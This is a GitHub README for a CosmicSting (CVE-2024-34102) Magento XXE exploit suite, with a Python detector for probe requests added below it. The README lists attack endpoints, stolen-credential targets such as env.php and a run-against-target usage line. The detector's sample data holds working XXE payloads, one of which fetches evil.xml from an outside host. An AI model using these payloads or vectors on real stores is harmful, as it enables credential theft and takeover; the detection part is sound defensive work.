russellwork2021-lgtm/cosmicsting-cve-2024-34102-exploit

GitHub: russellwork2021-lgtm/cosmicsting-cve-2024-34102-exploit

Stars: 0 | Forks: 0

# CosmicSting (CVE-2024-34102) Exploit Suite

Complete exploit suite for **CVE-2024-34102**, the CosmicSting XXE vulnerability in Adobe Commerce / Magento 2.4.x.

## Vulnerability Details

- **CVE**: CVE-2024-34102 (CVSS 9.8)
- **Type**: XML External Entity Injection (XXE), reached through nested deserialization of REST request bodies (see the AssetNote research below)
- **Impact**: Unauthenticated remote file read and SSRF; RCE when chained with a further bug (see the Ambionics CNEXT reference below)
- **Affected**: Adobe Commerce 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier

## Attack Vectors Tested

| Vector | Endpoint |
|--------|----------|
| Standard XXE | `/rest/V1/guest-carts/{id}/estimate-shipping-methods` |
| Standard XXE (all store code) | `/rest/all/V1/guest-carts/{id}/estimate-shipping-methods` |
| Billing Address | `/rest/V1/guest-carts/{id}/billing-address` |
| dataIsURL | Same endpoints with `dataIsURL: true`, so the parser fetches the payload from a URL instead of parsing it inline |
| totalsReader | Same endpoints with an alternative nested JSON structure |
| Orders | `/rest/V1/orders`, `/rest/V1/order` |
| Direct path | Direct fetch of `/app/etc/env.php`, `/.env`, etc. (web-root exposure check, not XXE) |

## Files Targeted

- `app/etc/env.php` (database credentials, encryption keys)
- `.env` (environment variables)
- `/etc/passwd` (user enumeration)
- `/etc/hosts` (internal network mapping)
- `/proc/self/environ` (process environment)
- `app/etc/config.php`, `app/etc/config.local.php`
- `var/log/system.log`, `var/log/exception.log`

Note that a leaked `crypt/key` from `env.php` is enough to forge admin API tokens, so a patched store whose `env.php` may already have been read should also rotate its encryption key.

## Usage

```bash
pip install requests
python3 cosmicsting-cve-2024-34102.py https://target.com
```

## References

- [AssetNote Research](https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102)
- [Sansec CosmicSting](https://sansec.io/research/cosmicsting)
- [SamJUK/cosmicsting-validator](https://github.com/SamJUK/cosmicsting-validator)
- [EQSTLab/CVE-2024-34102](https://github.com/EQSTLab/CVE-2024-34102)
- [th3gokul/CVE-2024-34102](https://github.com/th3gokul/CVE-2024-34102)
- [Nuclei Template](https://github.com/projectdiscovery/nuclei-templates)
- [Ambionics CNEXT + CosmicSting RCE](https://github.com/ambionics/cnext-exploits)
- [SpaceWasp Writeup](https://github.com/spacewasp/public_docs)
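## Detecting probes

The defensive counterpart of the vectors and target files listed above is a log check. The following is an added example, not code from this suite: it classifies request records (path plus JSON body) as CosmicSting probes when they hit one of the listed REST endpoints and carry the `dataIsURL`/`sourceData` keys, an inline DTD or external entity, or a reference to one of the targeted files. The record format and the sample requests are constructed for the demo, and the body nesting in the samples is simplified rather than the exact structure the exploit sends; the scanner keys off field names anywhere in the body, so that does not matter for detection.

```python
"""Detection helper for CosmicSting (CVE-2024-34102) probes.

Added example, not part of this exploit suite. It scans request records
(method, path, JSON body) for traits of an XXE probe against the Magento REST
endpoints listed in the README. The record field names and the sample
requests below are constructed for the demo.
"""
import json
import re

# REST paths the README lists as tested vectors (guest-cart id is a wildcard).
SUSPECT_PATHS = re.compile(
    r"^/rest/(?:all/)?V1/(?:guest-carts/[^/]+/(?:estimate-shipping-methods|billing-address)"
    r"|orders?)(?:$|[?/])"
)

# Markers of an inline DTD / external entity in any string value of the body.
XML_MARKERS = re.compile(r"<!DOCTYPE|<!ENTITY|SYSTEM\s+[\"']", re.I)

# Keys that only appear when a client is smuggling SimpleXMLElement constructor
# arguments through the nested address structure; `dataIsURL: true` makes PHP
# fetch the string as a URL instead of parsing it inline.
SUSPECT_KEYS = {"dataIsURL", "sourceData"}

# Files the README lists as read targets.
TARGET_FILES = ("app/etc/env.php", "app/etc/config.php", "/etc/passwd",
                "/proc/self/environ", "/etc/hosts", ".env")


def _walk(obj, keys, strings):
    """Collect every key and every string value in a nested JSON object."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            keys.add(k)
            _walk(v, keys, strings)
    elif isinstance(obj, list):
        for v in obj:
            _walk(v, keys, strings)
    elif isinstance(obj, str):
        strings.append(obj)


def classify(record):
    """Return the reasons a request looks like a CosmicSting probe (empty list = clean)."""
    reasons = []
    if not SUSPECT_PATHS.match(record["path"]):
        return reasons  # only the listed REST endpoints are of interest here
    try:
        body = json.loads(record.get("body") or "null")
    except ValueError:
        return ["unparseable JSON on a CosmicSting endpoint"]
    keys, strings = set(), []
    _walk(body, keys, strings)
    hit_keys = keys & SUSPECT_KEYS
    if hit_keys:
        reasons.append("nested-deserialization keys: " + ", ".join(sorted(hit_keys)))
    if any(XML_MARKERS.search(s) for s in strings):
        reasons.append("inline DTD / external entity in a string value")
    for s in strings:
        for f in TARGET_FILES:
            if f in s:
                reasons.append("references sensitive file " + f)
                break
    return reasons


def scan(records):
    """Return (path, reasons) for every record that classify() flags."""
    flagged = []
    for r in records:
        reasons = classify(r)
        if reasons:
            flagged.append((r["path"], reasons))
    return flagged


# Constructed sample traffic: one benign shipping estimate, two probes, one unrelated call.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/rest/V1/guest-carts/abc123/estimate-shipping-methods",
     "body": '{"address":{"region":"CA","postcode":"94016","country_id":"US"}}'},
    {"method": "POST", "path": "/rest/all/V1/guest-carts/abc123/estimate-shipping-methods",
     "body": json.dumps({"address": {"sourceData": {
         "data": '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///app/etc/env.php">]><x>&xxe;</x>',
         "dataIsURL": False}}})},
    {"method": "POST", "path": "/rest/V1/guest-carts/abc123/billing-address",
     "body": json.dumps({"address": {"sourceData": {"data": "http://203.0.113.5/evil.xml",
                                                    "dataIsURL": True}}})},
    {"method": "GET", "path": "/rest/V1/products/SKU-1", "body": ""},
]

if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_REQUESTS):
        print(path)
        for why in reasons:
            print("  -", why)
```

Feed `classify()` one record per request from whatever log or WAF export you have; the path filter keeps it cheap on high-volume stores, and the `dataIsURL` key alone is a strong signal because no legitimate storefront client sends it.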